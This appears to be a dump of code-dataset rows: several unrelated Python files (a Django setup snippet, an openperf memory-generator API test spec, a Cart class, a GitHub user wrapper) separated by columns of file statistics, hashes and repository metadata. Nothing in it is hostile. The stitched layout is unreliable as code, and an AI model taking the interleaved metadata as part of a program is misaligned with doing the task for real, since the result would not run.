# Point Django at the project settings and select the "Test" configuration
# class before initializing django-configurations; setdefault lets the
# environment override either value. Order matters: both variables must be
# set before configurations.setup() runs.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "project.settings")
os.environ.setdefault("DJANGO_CONFIGURATION", "Test")
configurations.setup()
| 25.428571
| 67
| 0.820225
| 20
| 178
| 7.15
| 0.6
| 0.125874
| 0.265734
| 0.34965
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.05618
| 178
| 6
| 68
| 29.666667
| 0.85119
| 0
| 0
| 0
| 0
| 0
| 0.348315
| 0.123596
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.4
| 0
| 0.4
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
aa71d7e15501ababcb044b9a7449ed0a1563ebc7
| 35,569
|
py
|
Python
|
tests/aat/spec/memory_spec.py
|
gchagnotSpt/openperf
|
0ae14cb7a685b1b059f707379773fb3bcb421d40
|
[
"Apache-2.0"
] | 20
|
2019-12-04T01:28:52.000Z
|
2022-03-17T14:09:34.000Z
|
tests/aat/spec/memory_spec.py
|
gchagnotSpt/openperf
|
0ae14cb7a685b1b059f707379773fb3bcb421d40
|
[
"Apache-2.0"
] | 115
|
2020-02-04T21:29:54.000Z
|
2022-02-17T13:33:51.000Z
|
tests/aat/spec/memory_spec.py
|
gchagnotSpt/openperf
|
0ae14cb7a685b1b059f707379773fb3bcb421d40
|
[
"Apache-2.0"
] | 16
|
2019-12-03T16:41:18.000Z
|
2021-11-06T04:44:11.000Z
|
import os
import time
import client.api
import client.models
from mamba import description, before, after, it
from expects import *
from expects.matchers import Matcher
from common import Config, Service
from common.helper import (make_dynamic_results_config,
check_modules_exists,
get_memory_dynamic_results_fields,
memory_generator_model,
wait_for_buffer_initialization_done)
from common.matcher import (has_location,
has_json_content_type,
raise_api_exception,
be_valid_memory_info,
be_valid_memory_generator,
be_valid_memory_generator_result,
be_valid_dynamic_results)
# Load the spec configuration from a file next to this spec; the file name
# can be overridden via the MAMBA_CONFIG environment variable (defaults to
# config.yaml).
CONFIG = Config(os.path.join(os.path.dirname(__file__),
                             os.environ.get('MAMBA_CONFIG', 'config.yaml')))
with description('Memory Generator Module', 'memory') as self:
with before.all:
service = Service(CONFIG.service())
self._process = service.start()
self._api = client.api.MemoryGeneratorApi(service.client())
if not check_modules_exists(service.client(), 'memory'):
self.skip()
with after.all:
try:
for gen in self.api.list_memory_generators():
if gen.running:
self.api.stop_memory_generator(gen.id)
self.api.delete_memory_generator(gen.id)
except AttributeError:
pass
try:
self._process.terminate()
self._process.wait()
except AttributeError:
pass
with description('Information'):
with description('/memory-info'):
with context('PUT'):
with it('not allowed (405)'):
expect(lambda: self._api.api_client.call_api('/memory-info', 'PUT')).to(
raise_api_exception(405, headers={'Allow': "GET"}))
with context('GET'):
with before.all:
self._result = self._api.memory_info_with_http_info(
_return_http_data_only=False)
with it('success (200)'):
expect(self._result[1]).to(equal(200))
with it('has Content-Type: application/json header'):
expect(self._result[2]).to(has_json_content_type)
with it('valid memory info'):
expect(self._result[0]).to(be_valid_memory_info)
with description('Memory Generators'):
with description('/memory-generators'):
with context('PUT'):
with it('not allowed (405)'):
expect(lambda: self._api.api_client.call_api('/memory-generators', 'PUT')).to(
raise_api_exception(405, headers={'Allow': "GET, POST"}))
with context('POST'):
with shared_context('create generator'):
with before.all:
self._result = self._api.create_memory_generator_with_http_info(
self._model, _return_http_data_only=False)
with after.all:
self._api.delete_memory_generator(self._result[0].id)
with it('created (201)'):
expect(self._result[1]).to(equal(201))
with it('has valid Location header'):
expect(self._result[2]).to(has_location('/memory-generators/' + self._result[0].id))
with it('has Content-Type: application/json header'):
expect(self._result[2]).to(has_json_content_type)
with it('returned valid generator'):
expect(self._result[0]).to(be_valid_memory_generator)
with it('has same config'):
if (not self._model.id):
self._model.id = self._result[0].id
self._model.init_percent_complete = self._result[0].init_percent_complete
expect(self._result[0]).to(equal(self._model))
with description('with empty ID'):
with before.all:
self._model = memory_generator_model(self._api.api_client)
with included_context('create generator'):
with it('random ID assigned'):
expect(self._result[0].id).not_to(be_empty)
with description('with specified ID'):
with before.all:
self._model = memory_generator_model(
self._api.api_client, id='some-specified-id')
with included_context('create generator'):
pass
with context('GET'):
with before.all:
model = memory_generator_model(self._api.api_client)
self._g8s = [self._api.create_memory_generator(model)
for a in range(3)]
self._result = self._api.list_memory_generators_with_http_info(
_return_http_data_only=False)
with after.all:
for g7r in self._g8s:
self._api.delete_memory_generator(g7r.id)
with it('success (200)'):
expect(self._result[1]).to(equal(200))
with it('has Content-Type: application/json header'):
expect(self._result[2]).to(has_json_content_type)
with it('return list'):
expect(self._result[0]).not_to(be_empty)
expect(len(self._result[0])).to(equal(len(self._g8s)))
for gen in self._result[0]:
expect(gen).to(be_valid_memory_generator)
with description('/memory-generators/{id}'):
with before.all:
model = memory_generator_model(self._api.api_client)
self._g7r = self._api.create_memory_generator(model)
expect(self._g7r).to(be_valid_memory_generator)
with after.all:
self._api.delete_memory_generator(self._g7r.id)
with context('GET'):
with description('by existing ID'):
with before.all:
self._result = self._api.get_memory_generator_with_http_info(
self._g7r.id, _return_http_data_only=False)
with it('success (200)'):
expect(self._result[1]).to(equal(200))
with it('has Content-Type: application/json header'):
expect(self._result[2]).to(has_json_content_type)
with it('generator object'):
expect(self._result[0]).to(be_valid_memory_generator)
with description('by non-existent ID'):
with it('not found (404)'):
expr = lambda: self._api.get_memory_generator('unknown')
expect(expr).to(raise_api_exception(404))
with description('by invalid ID'):
with it('bad request (400)'):
expr = lambda: self._api.get_memory_generator('bad_id')
expect(expr).to(raise_api_exception(400))
with context('DELETE'):
with description('by existing ID'):
with shared_context('delete generator'):
with it('deleted (204)'):
result = self._api.delete_memory_generator_with_http_info(
self._g7r.id, _return_http_data_only=False)
expect(result[1]).to(equal(204))
with it('not found (404)'):
expr = lambda: self._api.get_memory_generator(self._g7r.id)
expect(expr).to(raise_api_exception(404))
with description('not running generator'):
with before.all:
model = memory_generator_model(
self._api.api_client, running = False)
self._g7r = self._api.create_memory_generator(model)
expect(self._g7r).to(be_valid_memory_generator)
with it('not running'):
result = self._api.get_memory_generator(self._g7r.id)
expect(result.running).to(be_false)
with included_context('delete generator'):
pass
with description('running generator'):
with before.all:
model = memory_generator_model(
self._api.api_client, running = True)
self._g7r = self._api.create_memory_generator(model)
expect(self._g7r).to(be_valid_memory_generator)
with it('running'):
result = self._api.get_memory_generator(self._g7r.id)
expect(result.running).to(be_true)
with included_context('delete generator'):
pass
with description('by non-existent ID'):
with it('not found (404)'):
expr = lambda: self._api.delete_memory_generator('unknown')
expect(expr).to(raise_api_exception(404))
with description('by invalid ID'):
with it('bad request (400)'):
expr = lambda: self._api.delete_memory_generator('bad_id')
expect(expr).to(raise_api_exception(400))
with description('/memory-generators/{id}/start'):
with before.all:
model = memory_generator_model(self._api.api_client)
self._g7r = self._api.create_memory_generator(model)
expect(self._g7r).to(be_valid_memory_generator)
expect(wait_for_buffer_initialization_done(self._api, self._g7r.id, 10)).to(be_true)
with after.all:
self._api.delete_memory_generator(self._g7r.id)
with context('POST'):
with description('by existing ID'):
with before.all:
self._result = self._api.start_memory_generator_with_http_info(
self._g7r.id, _return_http_data_only=False)
with shared_context('start generator'):
with it('is not running'):
expect(self._g7r.running).to(be_false)
with it('started (201)'):
expect(self._result[1]).to(equal(201))
with it('has valid Location header'):
expect(self._result[2]).to(has_location('/memory-generator-results/' + self._result[0].id))
with it('has Content-Type: application/json header'):
expect(self._result[2]).to(has_json_content_type)
with it('returned valid result'):
expect(self._result[0]).to(be_valid_memory_generator_result)
expect(self._result[0].active).to(be_true)
expect(self._result[0].generator_id).to(equal(self._g7r.id))
with it('is running'):
g7r = self._api.get_memory_generator(self._g7r.id)
expect(g7r).to(be_valid_memory_generator)
expect(g7r.running).to(be_true)
with included_context('start generator'):
pass
with description('already running generator'):
with it('bad request (400)'):
expr = lambda: self._api.start_memory_generator(self._g7r.id)
expect(expr).to(raise_api_exception(400))
with description('with Dynamic Results'):
with before.all:
self._api.stop_memory_generator(self._g7r.id)
dynamic = make_dynamic_results_config(
get_memory_dynamic_results_fields())
self._result = self._api.start_memory_generator_with_http_info(
self._g7r.id, dynamic_results=dynamic, _return_http_data_only=False)
with included_context('start generator'):
with it('has valid dynamic results'):
expect(self._result[0].dynamic_results).to(be_valid_dynamic_results)
with description('by non-existent ID'):
with it('not found (404)'):
expr = lambda: self._api.start_memory_generator('unknown')
expect(expr).to(raise_api_exception(404))
with description('by invalid ID'):
with it('bad request (400)'):
expr = lambda: self._api.start_memory_generator('bad_id')
expect(expr).to(raise_api_exception(400))
with description('/memory-generators/{id}/stop'):
with before.all:
model = memory_generator_model(
self._api.api_client, running=True)
self._g7r = self._api.create_memory_generator(model)
expect(self._g7r).to(be_valid_memory_generator)
expect(wait_for_buffer_initialization_done(self._api, self._g7r.id, 10)).to(be_true)
with after.all:
self._api.delete_memory_generator(self._g7r.id)
with context('POST'):
with description('by existing ID'):
with it('is running'):
expect(self._g7r.running).to(be_true)
with it('stopped (204)'):
result = self._api.stop_memory_generator_with_http_info(
self._g7r.id, _return_http_data_only=False)
expect(result[1]).to(equal(204))
with it('is not running'):
g7r = self._api.get_memory_generator(self._g7r.id)
expect(g7r).to(be_valid_memory_generator)
expect(g7r.running).to(be_false)
with description('already stopped generator'):
with it('bad request (400)'):
expr = lambda: self._api.stop_memory_generator(self._g7r.id)
expect(expr).to(raise_api_exception(400))
with description('by non-existent ID'):
with it('not found (404)'):
expr = lambda: self._api.start_memory_generator('unknown')
expect(expr).to(raise_api_exception(404))
with description('by invalid ID'):
with it('bad request (400)'):
expr = lambda: self._api.start_memory_generator('bad_id')
expect(expr).to(raise_api_exception(400))
with description('Memory Generators bulk operations'):
with description('/memory-generators/x/bulk-create'):
with context('PUT'):
with it('not allowed (405)'):
expect(lambda: self._api.api_client.call_api('/memory-generators/x/bulk-create', 'PUT')).to(
raise_api_exception(405, headers={'Allow': "POST"}))
with description('POST'):
with before.all:
self._models = [
memory_generator_model(self._api.api_client),
memory_generator_model(self._api.api_client)
]
request = client.models.BulkCreateMemoryGeneratorsRequest(self._models)
self._result = self._api.bulk_create_memory_generators_with_http_info(
request, _return_http_data_only=False)
with after.all:
for g7r in self._result[0]:
self._api.delete_memory_generator(g7r.id)
with it('created (200)'):
expect(self._result[1]).to(equal(200))
with it('has Content-Type: application/json header'):
expect(self._result[2]).to(has_json_content_type)
with it('returned valid generator list'):
expect(self._result[0]).not_to(be_empty)
expect(len(self._result[0])).to(equal(len(self._models)))
for g7r in self._result[0]:
expect(g7r).to(be_valid_memory_generator)
with it('has same config'):
for idx in range(len(self._models)):
model = self._models[idx]
model.init_percent_complete = self._result[0][idx].init_percent_complete
if (not model.id):
model.id = self._result[0][idx].id
expect(self._result[0][idx]).to(equal(model))
with description('/memory-generators/x/bulk-delete'):
with context('PUT'):
with it('not allowed (405)'):
expect(lambda: self._api.api_client.call_api('/memory-generators/x/bulk-delete', 'PUT')).to(
raise_api_exception(405, headers={'Allow': "POST"}))
with context('POST'):
with before.all:
self._ids = []
self._model = memory_generator_model(
self._api.api_client, running=False)
with shared_context('delete generators'):
with before.all:
self._g8s = [
self._api.create_memory_generator(self._model)
for i in range(3)]
with it('all exist'):
for g7r in self._g8s:
result = self._api.get_memory_generator(g7r.id)
expect(result).to(be_valid_memory_generator)
with it('no content (204)'):
request = client.models.BulkDeleteCpuGeneratorsRequest(
[g7r.id for g7r in self._g8s] + self._ids)
result = self._api.bulk_delete_memory_generators_with_http_info(
request, _return_http_data_only=False)
expect(result[1]).to(equal(204))
with it('all deleted'):
for g7r in self._g8s:
result = lambda: self._api.get_memory_generator(g7r.id)
expect(result).to(raise_api_exception(404))
with description('with existing IDs'):
with included_context('delete generators'):
pass
with description('with non-existent ID'):
with before.all:
self._ids = ['unknown']
with included_context('delete generators'):
pass
with description('with invalid ID'):
with before.all:
self._ids = ['bad_id']
with included_context('delete generators'):
pass
with description('/memory-generators/x/bulk-start'):
with context('PUT'):
with it('not allowed (405)'):
expect(lambda: self._api.api_client.call_api('/memory-generators/x/bulk-start', 'PUT')).to(
raise_api_exception(405, headers={'Allow': "POST"}))
with description('POST'):
with before.all:
model = memory_generator_model(self._api.api_client)
self._g8s = [
self._api.create_memory_generator(model)
for a in range(3)]
for a in range(3):
expect(wait_for_buffer_initialization_done(self._api, self._g8s[a].id, 10)).to(be_true)
with after.all:
request = client.models.BulkDeleteMemoryGeneratorsRequest(
[g7r.id for g7r in self._g8s])
self._api.bulk_delete_memory_generators(request)
with description('by existing IDs'):
with before.all:
request = client.models.BulkStartMemoryGeneratorsRequest(
[g7r.id for g7r in self._g8s])
self._result = self._api.bulk_start_memory_generators_with_http_info(
request, _return_http_data_only=False)
with it('is not running'):
for g7r in self._g8s:
expect(g7r.running).to(be_false)
with it('success (200)'):
expect(self._result[1]).to(equal(200))
with it('has Content-Type: application/json header'):
expect(self._result[2]).to(has_json_content_type)
with it('returned valid results'):
for result in self._result[0]:
expect(result).to(be_valid_memory_generator_result)
expect(result.active).to(be_true)
with it('all started'):
for g7r in self._g8s:
result = self._api.get_memory_generator(g7r.id)
expect(result).to(be_valid_memory_generator)
expect(result.running).to(be_true)
with description('already running generators'):
with it('bad request (400)'):
request = client.models.BulkStartMemoryGeneratorsRequest(
[g7r.id for g7r in self._g8s])
expr = lambda: self._api.bulk_start_memory_generators(request)
expect(expr).to(raise_api_exception(400))
with it('state was not changed'):
for g7r in self._g8s:
result = self._api.get_memory_generator(g7r.id)
expect(result).to(be_valid_memory_generator)
expect(result.running).to(be_true)
with description('with non-existant ID'):
with before.all:
for num, g7r in enumerate(self._g8s, start=1):
try:
if (num % 2) == 0:
g7r.running = False
self._api.stop_memory_generator(g7r.id)
else:
g7r.running = True
self._api.start_memory_generator(g7r.id)
except Exception:
pass
self._results_count = len(self._api.list_memory_generator_results())
with it('not found (404)'):
request = client.models.BulkStartMemoryGeneratorsRequest(
[g7r.id for g7r in self._g8s] + ['unknown'])
expr = lambda: self._api.bulk_start_memory_generators(request)
expect(expr).to(raise_api_exception(404))
with it('state was not changed'):
for g7r in self._g8s:
result = self._api.get_memory_generator(g7r.id)
expect(result).to(be_valid_memory_generator)
expect(result.running).to(equal(g7r.running))
with it('new results was not created'):
results = self._api.list_memory_generator_results()
expect(len(results)).to(equal(self._results_count))
with description('with invalid ID'):
with before.all:
self._results_count = len(self._api.list_memory_generator_results())
with it('bad request (400)'):
request = client.models.BulkStartMemoryGeneratorsRequest(
[g7r.id for g7r in self._g8s] + ['bad_id'])
expr = lambda: self._api.bulk_start_memory_generators(request)
expect(expr).to(raise_api_exception(400))
with it('state was not changed'):
for g7r in self._g8s:
result = self._api.get_memory_generator(g7r.id)
expect(result).to(be_valid_memory_generator)
expect(result.running).to(equal(g7r.running))
with it('new results was not created'):
results = self._api.list_memory_generator_results()
expect(len(results)).to(equal(self._results_count))
with description('/memory-generators/x/bulk-stop'):
with context('PUT'):
with it('not allowed (405)'):
expect(lambda: self._api.api_client.call_api('/memory-generators/x/bulk-stop', 'PUT')).to(
raise_api_exception(405, headers={'Allow': "POST"}))
with description('POST'):
with before.all:
self._ids = []
model = memory_generator_model(self._api.api_client)
self._g8s = [
self._api.create_memory_generator(model)
for a in range(3)]
for a in range(3):
expect(wait_for_buffer_initialization_done(self._api, self._g8s[a].id, 10)).to(be_true)
with after.all:
request = client.models.BulkDeleteMemoryGeneratorsRequest(
[g7r.id for g7r in self._g8s])
self._api.bulk_delete_memory_generators(request)
with shared_context('stop generators'):
with before.all:
for g7r in self._g8s:
self._api.start_memory_generator(g7r.id)
with it('all running'):
for g7r in self._g8s:
result = self._api.get_memory_generator(g7r.id)
expect(result.running).to(be_true)
with it('no content (204)'):
request = client.models.BulkStopMemoryGeneratorsRequest(
[g7r.id for g7r in self._g8s] + self._ids)
result = self._api.bulk_stop_memory_generators_with_http_info(
request, _return_http_data_only=False)
expect(result[1]).to(equal(204))
with it('all stopped'):
for g7r in self._g8s:
result = self._api.get_memory_generator(g7r.id)
expect(result).to(be_valid_memory_generator)
expect(result.running).to(be_false)
with description('with existing IDs'):
with included_context('stop generators'):
pass
with description('already stopped generators'):
with it('no content (204)'):
request = client.models.BulkStopMemoryGeneratorsRequest(
[g7r.id for g7r in self._g8s])
result = self._api.bulk_stop_memory_generators_with_http_info(
request, _return_http_data_only=False)
expect(result[1]).to(equal(204))
with description('with non-existent ID'):
with before.all:
self._ids = ['unknown']
with included_context('stop generators'):
pass
with description('with invalid ID'):
with before.all:
self._ids = ['bad_id']
with included_context('stop generators'):
pass
with description('Memory Generator Results'):
with before.all:
model = memory_generator_model(self._api.api_client)
self._g7r = self._api.create_memory_generator(model)
expect(self._g7r).to(be_valid_memory_generator)
expect(wait_for_buffer_initialization_done(self._api, self._g7r.id, 10)).to(be_true)
self._runs = 3;
for i in range(self._runs):
self._api.start_memory_generator(self._g7r.id)
self._api.stop_memory_generator(self._g7r.id)
with description('/memory-generator-results'):
with context('PUT'):
with it('not allowed (405)'):
expect(lambda: self._api.api_client.call_api('/memory-generator-results', 'PUT')).to(
raise_api_exception(405, headers={'Allow': "GET"}))
with context('GET'):
with before.all:
self._result = self._api.list_memory_generator_results_with_http_info(
_return_http_data_only=False)
with it('success (200)'):
expect(self._result[1]).to(equal(200))
with it('has Content-Type: application/json header'):
expect(self._result[2]).to(has_json_content_type)
with it('results list'):
expect(self._result[0]).not_to(be_empty)
expect(len(self._result[0])).to(be(self._runs))
for result in self._result[0]:
expect(result).to(be_valid_memory_generator_result)
with description('/memory-generator-results/{id}'):
with before.all:
rlist = self._api.list_memory_generator_results()
expect(rlist).not_to(be_empty)
self._result = rlist[0]
with context('GET'):
with description('by existing ID'):
with before.all:
self._get_result = self._api.get_memory_generator_result_with_http_info(
self._result.id, _return_http_data_only=False)
with it('success (200)'):
expect(self._get_result[1]).to(equal(200))
with it('has Content-Type: application/json header'):
expect(self._get_result[2]).to(has_json_content_type)
with it('valid result'):
expect(self._get_result[0]).to(be_valid_memory_generator_result)
with description('by non-existent ID'):
with it('not found (404)'):
expr = lambda: self._api.get_memory_generator_result('unknown')
expect(expr).to(raise_api_exception(404))
with description('by invalid ID'):
with it('bad request (400)'):
expr = lambda: self._api.get_memory_generator_result('bad_id')
expect(expr).to(raise_api_exception(400))
with context('DELETE'):
with description('by existing ID'):
with description('active result'):
with before.all:
self._result = self._api.start_memory_generator(self._g7r.id)
with after.all:
self._api.stop_memory_generator(self._g7r.id)
with it('exists'):
expect(self._result).to(be_valid_memory_generator_result)
with it('is active'):
expect(self._result.active).to(be_true)
with it('bad request (400)'):
result = lambda: self._api.delete_memory_generator_result(self._result.id)
expect(result).to(raise_api_exception(400))
with it('not deleted'):
result = self._api.get_memory_generator_result(self._result.id)
expect(result).to(be_valid_memory_generator_result)
with description('inactive result'):
with before.all:
result = self._api.start_memory_generator(self._g7r.id)
self._api.stop_memory_generator(self._g7r.id)
self._result = self._api.get_memory_generator_result(result.id)
with it('exists'):
expect(self._result).to(be_valid_memory_generator_result)
with it('is not active'):
expect(self._result.active).to(be_false)
with it('deleted (204)'):
result = self._api.delete_memory_generator_result_with_http_info(
self._result.id, _return_http_data_only=False)
expect(result[1]).to(equal(204))
with it('not found (404)'):
expr = lambda: self._api.get_memory_generator_result(self._result.id)
expect(expr).to(raise_api_exception(404))
with description('by non-existent ID'):
with it('not found (404)'):
expr = lambda: self._api.delete_memory_generator_result('unknown')
expect(expr).to(raise_api_exception(404))
with description('by invalid ID'):
with it('bad request (400)'):
expr = lambda: self._api.delete_memory_generator_result('bad_id')
expect(expr).to(raise_api_exception(400))
with description('delete results with generator'):
with it('results exists'):
results = self._api.list_memory_generator_results()
expect(results).not_to(be_empty)
with it('generator deleted'):
result = self._api.delete_memory_generator_with_http_info(
self._g7r.id, _return_http_data_only=False)
expect(result[1]).to(equal(204))
with it('results deleted'):
results = self._api.list_memory_generator_results()
expect(results).to(be_empty)
| 47.425333
| 119
| 0.506424
| 3,586
| 35,569
| 4.748745
| 0.047128
| 0.109225
| 0.032885
| 0.031241
| 0.860004
| 0.81326
| 0.787128
| 0.74285
| 0.716542
| 0.684068
| 0
| 0.021557
| 0.398774
| 35,569
| 749
| 120
| 47.488652
| 0.774749
| 0
| 0
| 0.664992
| 0
| 0
| 0.099441
| 0.012258
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.021776
| 0.01675
| 0
| 0.01675
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
aa89a6f6abe7fdaa9e448870b527b47790971067
| 221
|
py
|
Python
|
src/models/cart.py
|
ehizman/eden
|
d231f614078c7031eaba63f7864fb7996927cc6d
|
[
"MIT"
] | null | null | null |
src/models/cart.py
|
ehizman/eden
|
d231f614078c7031eaba63f7864fb7996927cc6d
|
[
"MIT"
] | 1
|
2021-09-09T13:09:41.000Z
|
2021-09-10T13:31:00.000Z
|
src/models/cart.py
|
ehizman/eden
|
d231f614078c7031eaba63f7864fb7996927cc6d
|
[
"MIT"
] | 2
|
2021-08-19T15:03:22.000Z
|
2021-09-09T10:03:40.000Z
|
class Cart:
    """A minimal shopping cart that collects items in insertion order."""

    def __init__(self):
        # Name-mangled backing list; callers go through the methods below.
        self.__list_of_items = list()

    def add_item_to_cart(self, item):
        """Place *item* at the end of the cart."""
        self.__list_of_items.append(item)

    def get_items_in_cart(self):
        """Return the cart's item list (the live list, not a copy)."""
        return self.__list_of_items
| 22.1
| 41
| 0.669683
| 33
| 221
| 3.818182
| 0.454545
| 0.190476
| 0.238095
| 0.357143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.239819
| 221
| 9
| 42
| 24.555556
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.428571
| false
| 0
| 0
| 0.142857
| 0.714286
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
2acf36ce7efb89e3384f4960b0129791045fd2b8
| 79
|
py
|
Python
|
pygul/__init__.py
|
mailcorahul/pygul
|
799c409ef315e7c012d91ead8b40cb96834a9302
|
[
"MIT"
] | null | null | null |
pygul/__init__.py
|
mailcorahul/pygul
|
799c409ef315e7c012d91ead8b40cb96834a9302
|
[
"MIT"
] | null | null | null |
pygul/__init__.py
|
mailcorahul/pygul
|
799c409ef315e7c012d91ead8b40cb96834a9302
|
[
"MIT"
] | null | null | null |
def README():
    """Print a one-line description of the pygul package to stdout."""
    blurb = 'A Python Utility for Computer Vision and Deep learning'
    print(blurb)
| 26.333333
| 64
| 0.759494
| 12
| 79
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.151899
| 79
| 2
| 65
| 39.5
| 0.895522
| 0
| 0
| 0
| 0
| 0
| 0.683544
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0
| 0.5
| 0.5
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
6318e1ad23dd03def6b78e5910808798495c2794
| 68
|
py
|
Python
|
eddn/__init__.py
|
Athanasius/eddn-listener
|
90ea17676ff0cdbc5264cd1af5a7fd177b187d8e
|
[
"MIT"
] | null | null | null |
eddn/__init__.py
|
Athanasius/eddn-listener
|
90ea17676ff0cdbc5264cd1af5a7fd177b187d8e
|
[
"MIT"
] | null | null | null |
eddn/__init__.py
|
Athanasius/eddn-listener
|
90ea17676ff0cdbc5264cd1af5a7fd177b187d8e
|
[
"MIT"
] | 3
|
2017-09-03T18:06:56.000Z
|
2021-05-15T14:00:48.000Z
|
from eddn.database import database
from eddn.message import message
| 22.666667
| 34
| 0.852941
| 10
| 68
| 5.8
| 0.5
| 0.275862
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 68
| 2
| 35
| 34
| 0.966667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
2d875f9fe2e40fe5173a7c5c8c33a5c9462104c7
| 49
|
py
|
Python
|
playit/__init__.py
|
SaurabhGujjar/playit
|
8d7cd3a42cd6866ede45cf386d00410d97d16591
|
[
"MIT"
] | 1
|
2020-08-08T08:51:44.000Z
|
2020-08-08T08:51:44.000Z
|
playit/__init__.py
|
SaurabhGujjar/playit
|
8d7cd3a42cd6866ede45cf386d00410d97d16591
|
[
"MIT"
] | null | null | null |
playit/__init__.py
|
SaurabhGujjar/playit
|
8d7cd3a42cd6866ede45cf386d00410d97d16591
|
[
"MIT"
] | null | null | null |
from playit.cli import main, play, info, playlist
| 49
| 49
| 0.795918
| 8
| 49
| 4.875
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.122449
| 49
| 1
| 49
| 49
| 0.906977
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
2da8298beca01f53cead5ad8f4b4441d2c13fc7c
| 3,243
|
py
|
Python
|
aiogithubapi/objects/users/user.py
|
timmo001/aiogithubapi
|
9d33bad77e49f8ee720bcd81c2cbab8a4cf8ebac
|
[
"MIT"
] | 8
|
2019-07-24T18:14:25.000Z
|
2022-03-01T18:33:53.000Z
|
aiogithubapi/objects/users/user.py
|
timmo001/aiogithubapi
|
9d33bad77e49f8ee720bcd81c2cbab8a4cf8ebac
|
[
"MIT"
] | 33
|
2019-12-18T22:15:06.000Z
|
2022-03-30T06:08:38.000Z
|
aiogithubapi/objects/users/user.py
|
timmo001/aiogithubapi
|
9d33bad77e49f8ee720bcd81c2cbab8a4cf8ebac
|
[
"MIT"
] | 14
|
2019-09-02T17:50:16.000Z
|
2022-03-14T10:30:37.000Z
|
"""
Class object for AIOGitHubAPIUsersUser
Documentation: https://docs.github.com/en/rest/reference/users#get-a-user
Generated by generate/generate.py - 2020-08-02 10:35:28.920747
"""
from ..base import AIOGitHubAPIBase
class AIOGitHubAPIUsersUser(AIOGitHubAPIBase):
    """Read-only view of a GitHub user payload.

    Every accessor reads one key from ``self.attributes`` (presumably
    populated by ``AIOGitHubAPIBase`` from the API response — confirm in the
    base class) and falls back to a type-appropriate default: ``""`` for
    string fields, ``False`` for flags, ``None`` for the id and counters.
    """

    # String fields (default "").
    login = property(lambda self: self.attributes.get("login", ""))
    node_id = property(lambda self: self.attributes.get("node_id", ""))
    avatar_url = property(lambda self: self.attributes.get("avatar_url", ""))
    gravatar_id = property(lambda self: self.attributes.get("gravatar_id", ""))
    url = property(lambda self: self.attributes.get("url", ""))
    html_url = property(lambda self: self.attributes.get("html_url", ""))
    followers_url = property(lambda self: self.attributes.get("followers_url", ""))
    following_url = property(lambda self: self.attributes.get("following_url", ""))
    gists_url = property(lambda self: self.attributes.get("gists_url", ""))
    starred_url = property(lambda self: self.attributes.get("starred_url", ""))
    subscriptions_url = property(lambda self: self.attributes.get("subscriptions_url", ""))
    organizations_url = property(lambda self: self.attributes.get("organizations_url", ""))
    repos_url = property(lambda self: self.attributes.get("repos_url", ""))
    events_url = property(lambda self: self.attributes.get("events_url", ""))
    received_events_url = property(lambda self: self.attributes.get("received_events_url", ""))
    type = property(lambda self: self.attributes.get("type", ""))
    name = property(lambda self: self.attributes.get("name", ""))
    company = property(lambda self: self.attributes.get("company", ""))
    blog = property(lambda self: self.attributes.get("blog", ""))
    location = property(lambda self: self.attributes.get("location", ""))
    email = property(lambda self: self.attributes.get("email", ""))
    bio = property(lambda self: self.attributes.get("bio", ""))
    twitter_username = property(lambda self: self.attributes.get("twitter_username", ""))
    created_at = property(lambda self: self.attributes.get("created_at", ""))
    updated_at = property(lambda self: self.attributes.get("updated_at", ""))

    # Boolean flags (default False).
    site_admin = property(lambda self: self.attributes.get("site_admin", False))
